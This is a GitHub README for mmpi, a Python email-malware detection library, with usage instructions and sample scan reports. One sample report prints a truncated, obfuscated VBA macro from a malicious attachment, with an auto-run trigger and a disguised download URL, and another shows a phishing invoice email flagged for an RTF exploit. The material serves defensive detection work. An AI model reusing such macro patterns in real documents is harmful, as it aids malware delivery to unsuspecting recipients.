Skip to content

a232319779/mmpi

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

19 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

MMPI

mmpi,一款邮件快速检测python库,基于community框架设计开发。支持对邮件头、邮件正文、邮件附件的检测,并输出检测结果。

一、安装

$ pip install mmpi

备注:windows安装yara-python,可以从这里下载,再使用pip install yara_python-xx-xx-xx-win_amd64.whl进行安装

二、使用

2.1 命令行工具

命令行 说明 使用示例 结果输出
nextb-mmpi-scan 使用nextb-mmpi-scan工具扫描指定的邮件目录或者邮件文件 nextb-mmpi-scan -s $email_dir 输出格式参考扫描结果
nextb-mmpi-run 使用nextb-mmpi-run工具扫描指定的邮件文件,并返回完整报告 nextb-mmpi-run -f $email_file 输出格式参考报告格式

2.2 快速开始

from mmpi import mmpi


def main():
    emp = mmpi()
    emp.parse('test.eml')
    report = emp.get_report()
    print(report)


if __name__ == "__main__":
    main()

三、扫描结果输出

扫描输出格式如下

> nextb-mmpi-scan.exe -s .
nextb-mmpi-scan扫描中: 100%|████████████████████████████████████████████████████████████████████████████████████| 11/11 [00:00<00:00, 23.35eml/s]
+----------+--------------------+
| 邮件名称 | NextB-mmpi命中标签 |
+----------+--------------------+
| .\1.eml  |       未检出       |
| .\10.eml |   spam_detection   |
| .\11.eml |       未检出       |
| .\2.eml  |       未检出       |
| .\3.eml  |       未检出       |
| .\4.eml  |  invalid_zip_file  |
| .\5.eml  | ole_type_not_match |
| .\6.eml  |       未检出       |
| .\7.eml  |   spam_detection   |
| .\8.eml  |       未检出       |
| .\9.eml  |   spam_detection   |
+----------+--------------------+

四、报告格式

包含固定字段:

  • headers:邮件头基本信息
  • body:邮件正文,text和html格式
  • attachments:附件列表
  • signatures:检测标签

动态字段:

  • vba:宏代码
  • rtf:rtf信息
  • zip:压缩包信息
# 示例1
{
    "headers": [
        {
            "From": [
                {
                    "name": "Mohd Mukhriz Ramli (MLNG/GNE)",
                    "addr": "[email protected]"
                }
            ],
            "To": [
                {
                    "name": "",
                    "addr": ""
                }
            ],
            "Subject": "Re: Proforma Invoice",
            "Date": "2020-11-24 12:37:38 UTC+01:00",
            "X-Originating-IP": []
        }
    ],
    "body": [
        {
            "type": "text",
            "content": " \nDEAR SIR, \n\nPLEASE SIGN THE PROFORMA INVOICE SO THAT I CAN PAY AS SOON AS POSSIBLE.\n\nATTACHED IS THE PROFORMA INVOICE,\n\nPLEASE REPLY QUICKLY, \n\nTHANKS & REGARDS' \n\nRAJASHEKAR \n\n Dubai I Kuwait I Saudi Arabia I India I Egypt \nKuwait: +965 22261501 \nSaudi Arabia: +966 920033029 \nUAE: +971 42431343 \nEmail ID: [email protected] [1]m\n \n\nLinks:\n------\n[1]\nhttps://deref-mail.com/mail/client/OV1N7sILlK8/dereferrer/?redirectUrl=https%3A%2F%2Fe.mail.ru%2Fcompose%2F%3Fmailto%3Dmailto%253ahelp%40rehlat.com"
        }
    ],
    "attachments": [
        {
            "type": "doc",
            "filename": "Proforma Invoice.doc",
            "filesize": 1826535,
            "md5": "558c4aa596b0c4259182253a86b35e8c",
            "sha1": "63982d410879c09ca090a64873bc582fcc7d802b"
        }
    ],
    "vba": [],
    "rtf": [
        {
            "is_ole": true,
            "format_id": 2,
            "format_type": "Embedded",
            "class_name": "EQUATion.3",
            "data_size": 912305,
            "md5": "a5cee525de80eb537cfea247271ad714"
        }
    ],
    "signatures": [
        {
            "name": "rtf_suspicious_detected",
            "description": "RTF Suspicious Detected",
            "severity": 3,
            "marks": [
                {
                    "type": "rtf",
                    "tag": "rtf_suspicious_detected"
                }
            ],
            "markcount": 1
        },
        {
            "name": "rtf_exploit_detected",
            "description": "RTF Exploit Detected",
            "severity": 9,
            "marks": [
                {
                    "type": "rtf",
                    "tag": "rtf_exploit_detected"
                }
            ],
            "markcount": 1
        }
    ]
}

# 示例2
{
    "headers": [
        {
            "From": [
                {
                    "name": "Pagon Favre | Purchase",
                    "addr": "[email protected]"
                }
            ],
            "To": [
                {
                    "name": "",
                    "addr": "[email protected]"
                }
            ],
            "Subject": "Purchase Order - 19122020 [Early Dispatch Required]",
            "Date": "2020-12-17 13:48:57 UTC-08:00",
            "X-Originating-IP": []
        }
    ],
    "body": [],
    "attachments": [
        {
            "type": "pps",
            "filename": "Order Details.pps",
            "filesize": 130048,
            "md5": "9e6f2637079a311344f3cf2546de6a88",
            "sha1": "ff4da8a90127f5a6feec7af650fa7014050d25c2"
        },
        {
            "type": "ppt",
            "filename": "Purchase Order 19122020.ppt",
            "filesize": 130048,
            "md5": "9e6f2637079a311344f3cf2546de6a88",
            "sha1": "ff4da8a90127f5a6feec7af650fa7014050d25c2"
        }
    ],
    "vba": [
        {
            "size": 23358,
            "code": "Attribute VB_Name = \"Module1\"\r\nSub Auto_CloSe()\r\n\r\nDim myChrysler As String\r\n\r\nDim myFord As String\r\n\r\nDim SistersRangeRover As String\r\n\r\nmyChrysler = decrypt(\"p\", \"3\") + decrypt(\"|\", \"9\") + decrypt(\"o\", \"7\") + decrypt(\"}\", \"9\") + decrypt(\"c\", \"2\")\r\n\r\nSistersRangeRover = \" http://%999%[email protected]/asdnabsdjncjnkk\"\r\n\r\n
            ....
            "
        }
    ],
    "signatures": [
        {
            "name": "yara_detected",
            "description": "detected from yara rule",
            "severity": 9,
            "marks": [
                {
                    "type": "vba",
                    "tag": "obfuscate_macros",
                    "description": "obfuscate macros",
                    "severity": 6
                },
                {
                    "type": "vba",
                    "tag": "exec_macros",
                    "description": "exec macros",
                    "severity": 9
                }
            ],
            "markcount": 2
        }
    ]
}
# 示例3
{
    "headers": [
        {
            "From": [
                {
                    "name": "\u7231\u83f2\u7684\u86df\u9f99",
                    "addr": "[email protected]"
                }
            ],
            "To": [],
            "Subject": "\u7231\u83f2\u7684\u86df\u9f99 \u5bc4\u6765\u7684\u8d3a\u5361",
            "Date": "2008-04-26 11:09:07 UTC+08:00",
            "X-Originating-IP": []
        }
    ],
    "body": [
        {
            "type": "text",
            "content": "\u7231\u83f2\u7684\u86df\u9f99 \u5bc4\u6765\u7684\u8d3a\u5361\u300a\u626b\u5893\u53bb\u300b \u56de\u8d60\u8d3a\u5361\u7ed9\u60a8\u7684\u597d\u53cb\r\n\r\n \u5982\u679c\u60a8\u65e0\u6cd5\u67e5\u770b\u8d3a\u5361\uff0c\u70b9\u51fb\u6b64\u5904\u67e5\u770b\u3002\r\n     \u5c71\u6e05\u6c34\u79c0\u98ce\u5149\u597d\uff0c\u6708\u660e\u661f\u7a00\u796d\u626b\u591a\uff0c\u6e05\u660e\u8282\u5230\u4e86\uff0c\u4e00\u8d77\u626b\u5893\u53bb\u5427"
        }
    ],
    "attachments": [],
    "signatures": []
}

五、检测简要说明

5.1 邮件头检测

邮件头解析提取邮件发件人姓名、邮箱、收件人姓名、邮箱、邮件主题、发送时间、发送IP。

通过对发件人邮箱、发送IP做黑名单匹配,实现邮件头检测。

5.2 邮件正文检测

邮件正文解析提取text、html格式内容。

对html文件做分析,实现诸如探针检测、钓鱼检测、垃圾邮件检测等检测逻辑。

5.3 邮件附件检测

邮件附件检测,支持以下文件格式:

  • ole文件格式:如docxls等,提取其中的vba宏代码、模板注入链接
  • zip文件格式:提取压缩文件列表,统计文件名、文件格式等
  • rtf文件格式:解析内嵌ole对象等
  • 其他文件格式:如PE可执行文件

检测逻辑包括:

  • 基本信息规则检测
  • yara规则检测

六、感谢